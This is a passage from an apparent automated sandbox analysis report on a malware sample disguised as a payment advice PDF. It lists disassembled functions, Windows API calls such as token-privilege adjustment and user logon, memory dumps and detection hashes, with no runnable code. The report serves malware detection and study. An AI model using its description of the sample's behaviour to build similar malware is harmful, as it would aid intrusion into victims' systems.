                                                              • Opcode Fuzzy Hash: 2988a6b6ccc805819f9bda5c9fb48ec794f1e0770423385987e19b6fbf8df3df
                                                              • Instruction Fuzzy Hash: C1F0823551522DBBEB619FA8CC48FEA776DFF09361F008165F909D6581D7309940CBA2
                                                              Function 008981CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00898309), ref: 008981E0
                                                              • CloseHandle.KERNEL32(?,?,00898309), ref: 008981F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 20d59b47d53fe0bfa084e1c4ca2f1373b827ba9e036429ebe511aea60bd480f8
                                                              • Instruction ID: 8d3ff3ffaf2694f66efb0b0c2230b424c7a2ab0c641edc50f9581b9225dbf512
                                                              • Opcode Fuzzy Hash: 20d59b47d53fe0bfa084e1c4ca2f1373b827ba9e036429ebe511aea60bd480f8
                                                              • Instruction Fuzzy Hash: 0CE0B672010A21AFEB252B65EC09D777BAAFB04310B15882AB9A6C4471DB72AC91DB14
                                                              Function 0086A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00868D57,?,?,?,00000001), ref: 0086A15A
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0086A163
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 5fc794624640f5ce73385fe5a862535f7ebe6b9ea3becf2fcd189acb61aa7382
                                                              • Instruction ID: 5ce5849bd157ad6909b2731fd587cc9801fd180865b8ba21bddf13145566f97f
                                                              • Opcode Fuzzy Hash: 5fc794624640f5ce73385fe5a862535f7ebe6b9ea3becf2fcd189acb61aa7382
                                                              • Instruction Fuzzy Hash: 29B09231054248BBEA002BA1EC09F883F7AFB84AA2F404020FB0D84262CB7256508A91
                                                              Function 0086F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c813785f846c8ba5cf3b79d4d847a719a40e4116b94a72b563d2de32556ab272
                                                              • Instruction ID: ee2a8d2bf42b12724509683933f622f8251568495f79ca3f10918ad3baa48430
                                                              • Opcode Fuzzy Hash: c813785f846c8ba5cf3b79d4d847a719a40e4116b94a72b563d2de32556ab272
                                                              • Instruction Fuzzy Hash: 5E32E222D2AF414DD7239634E822336A749FFB73D5F55D737E81AB5AA6EB28C4834100
                                                              Function 0087242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bc4298ae718ce8f0c9a5002d88e0c4510e81f6a142e91a889bf2475052c56dd
                                                              • Instruction ID: 7e7ae076a71354d6cc0b18102240bba96849237eeaafdb8bfdb032ee178ba8c0
                                                              • Opcode Fuzzy Hash: 6bc4298ae718ce8f0c9a5002d88e0c4510e81f6a142e91a889bf2475052c56dd
                                                              • Instruction Fuzzy Hash: A1B1EF20D2AF404DD22796398831336BB5DBFBB2D5F61D71BFC2A70E26EB2185834141
                                                              Function 008A8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __time64.LIBCMT ref: 008A889B
                                                                • Part of subcall function 0086520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008A8F6E,00000000,?,?,?,?,008A911F,00000000,?), ref: 00865213
                                                                • Part of subcall function 0086520A: __aulldiv.LIBCMT ref: 00865233
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: d3e34e2d924c31e319381dff3884661242461ff5050a481ce766186326f2866b
                                                              • Instruction ID: b456d51ba7f898f0d5eb4bd92ee0187bd71c3122308e88891623ad68ecc2e69e
                                                              • Opcode Fuzzy Hash: d3e34e2d924c31e319381dff3884661242461ff5050a481ce766186326f2866b
                                                              • Instruction Fuzzy Hash: 5E21AF32639610CFD729CF29D841A52B3E5EBA5311B688E6CE0F5CB2C0CF74A905DB54
                                                              Function 008A4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008A4C4A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: 6505650bc739473b910ecda6a907b199cb850519e93f16f807600e97efc73fd9
                                                              • Instruction ID: edea11bffd3b1a2dada725bd6b60b68125b92a57631817d1d0b1af44a58bf53d
                                                              • Opcode Fuzzy Hash: 6505650bc739473b910ecda6a907b199cb850519e93f16f807600e97efc73fd9
                                                              • Instruction Fuzzy Hash: 70D05E9916520D78FC1C07209E0FF7A4108F3C27B6FD0B1497209CA8C2ECF06C416031
                                                              Function 008987B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00898389), ref: 008987D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: 0c40a805a0834b2589c4cedded80f344c67f6f38a3a6906f1524c698b97d856e
                                                              • Instruction ID: f262d7884f9e18ae61fe62214edc7b0beabae58160b891ee2f47e3416c035472
                                                              • Opcode Fuzzy Hash: 0c40a805a0834b2589c4cedded80f344c67f6f38a3a6906f1524c698b97d856e
                                                              • Instruction Fuzzy Hash: 3BD09E3226490EABEF019EA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                              Function 0086A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0086A12A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: dfa3ef8bf9381c8a7c1869cda7f58076c95b790eb82ebdb88adb02dd19fbe19e
                                                              • Instruction ID: 566df0e4bc940a9270fbddd293c53d90b287388d9be25460450d360350e33ff0
                                                              • Opcode Fuzzy Hash: dfa3ef8bf9381c8a7c1869cda7f58076c95b790eb82ebdb88adb02dd19fbe19e
                                                              • Instruction Fuzzy Hash: 52A0123000010CB78A001B51EC048447F6DE640190B004020F50C40122873255104580
                                                              Function 00858808 Relevance: .6, Instructions: 590COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9364118d9f00e1aa43d9ce942d5e23f799da16d77d7f4d0cade6e59ff8d0a66
                                                              • Instruction ID: 510cfc21f741d7b8ddd43f41dc7c6c8a3bb29847a739352980c9f6deab181d30
                                                              • Opcode Fuzzy Hash: b9364118d9f00e1aa43d9ce942d5e23f799da16d77d7f4d0cade6e59ff8d0a66
                                                              • Instruction Fuzzy Hash: 6F22563060451ACBDF3A9B64C49477C7BA2FF4134AF28806BDD82EB592DB709C99C742
                                                              Function 008621C5 Relevance: .3, Instructions: 345COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction ID: 44e3d6e7e8e0d2c67ab4f7342420abce14945623783e25a3e2565ca3f2911cb5
                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction Fuzzy Hash: 36C160322055930ADF6D4639847803EFAA1BEA27B131B07ADD8B3CF1D5EE20C965D720
                                                              Function 008625FA Relevance: .3, Instructions: 341COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction ID: 263e81b3552d3ae1ea8ef34f865b40c8c8864ddd3968c6e0d5df536aa5a7313c
                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction Fuzzy Hash: 01C152322055930ADF6D463AC47453EBAA1BEA27B131F07ADD4B2DF1D5EE20C925E720
                                                              Function 00861978 Relevance: .3, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: ea1e02c2eb65f2f4ff20209ecdc83db9bd428e6160710bdf258c3208777dc677
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: F9C1623220519309DF6D463A847813EBAA1FEA27B231F176DD4B2CF1D6EE20C965D760
                                                              Function 01656580 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction ID: cd66f29c69f26f4539f6f838578c67574c4ce94734bffd433178708cd879d0e2
                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction Fuzzy Hash: 3941D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
                                                              Function 01656470 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction ID: 57ea17fcaabe49b002749630dda9a9675f39dfa618921aca381db3cb70098b9e
                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction Fuzzy Hash: 87019278A01109EFCB84DF98C6909AEFBB6FB48310F608599DD09A7701E730AE41DB80
                                                              Function 01656410 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction ID: b01a36e025b6289066af8a1b03e3ce9cba2413924ce59161caf62577d6e7571d
                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction Fuzzy Hash: E6019278A01109EFCB84DF98C5909AEFBB6FB48310F608599DC19A7701E730AE41DB90
                                                              Function 01654DD0 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                              Function 008B7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 008B785B
                                                              • DeleteObject.GDI32(00000000), ref: 008B786D
                                                              • DestroyWindow.USER32 ref: 008B787B
                                                              • GetDesktopWindow.USER32 ref: 008B7895
                                                              • GetWindowRect.USER32(00000000), ref: 008B789C
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008B79DD
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008B79ED
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7A35
                                                              • GetClientRect.USER32(00000000,?), ref: 008B7A41
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008B7A7B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7A9D
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7AB0
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7ABB
                                                              • GlobalLock.KERNEL32(00000000), ref: 008B7AC4
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7AD3
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 008B7ADC
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7AE3
                                                              • GlobalFree.KERNEL32(00000000), ref: 008B7AEE
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7B00
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008D2CAC,00000000), ref: 008B7B16
                                                              • GlobalFree.KERNEL32(00000000), ref: 008B7B26
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 008B7B4C
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 008B7B6B
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7B8D
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7D7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: a6903321cbebabb003423580487d0e7f509663546999df88f2c96fb15b9b5207
                                                              • Instruction ID: 367a874e1171e5d94e7149ce548dd64eebf38c68af17ab5a4f60200960790964
                                                              • Opcode Fuzzy Hash: a6903321cbebabb003423580487d0e7f509663546999df88f2c96fb15b9b5207
                                                              • Instruction Fuzzy Hash: 52022B71910219AFDB14DFA8DC89EAE7BB9FF48310F148169F915EB2A1C774AD01CB60
                                                              Function 008C356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,008CF910), ref: 008C3627
                                                              • IsWindowVisible.USER32(?), ref: 008C364B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpperVisibleWindow
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 4105515805-45149045
                                                              • Opcode ID: 0f2d69a8f0835a13ba002a9f8624864bb0aa27154f7811d5ed8caa32c6f098a0
                                                              • Instruction ID: 0fd19fa37dabc053d9e38ed57632c8bf4dd7cb366b37d4c5d4bb87cad9b6b4e8
                                                              • Opcode Fuzzy Hash: 0f2d69a8f0835a13ba002a9f8624864bb0aa27154f7811d5ed8caa32c6f098a0
                                                              • Instruction Fuzzy Hash: 40D159302043159BCA14EF68C451F6E7BA1FF95394F15846CF9C6DB2A2DB31EA0ADB42
                                                              Function 008CA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
